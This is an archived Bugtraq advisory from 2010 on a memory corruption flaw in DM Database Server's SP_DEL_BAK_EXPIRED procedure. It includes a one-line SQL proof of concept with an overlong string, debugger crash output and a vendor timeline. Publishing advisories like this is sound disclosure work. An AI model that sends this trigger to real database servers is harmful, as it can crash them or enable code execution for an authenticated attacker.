| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 31 May 2010 01:30:42 -0000
From: wsn1983@...il.com
To: bugtraq@...urityfocus.com
Subject: DM Database Server Memory Corruption Vulnerability
DM Database Server Memory Corruption Vulnerability
Vulnerable: All Version
Vendor: www.dameng.com
Discovered by: Shennan Wang (HuaweiSymantec SRT)
Details:
=========
A vulnerability in DM Database Server all version allows attacker to execute arbitrary code or cause a DoS (Denial of
Service).Authentication is required to exploit this vulnerability.
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.
POC:
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll -
wdm_dll+0xd1753:
100d1753 f2ae repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc "AAAAAAAAAAAAAAAAAAAA"
Timeline:
========
2010.04.17 Report to vendor,no response.
2010.05.31 Public
Powered by blists - more mailing lists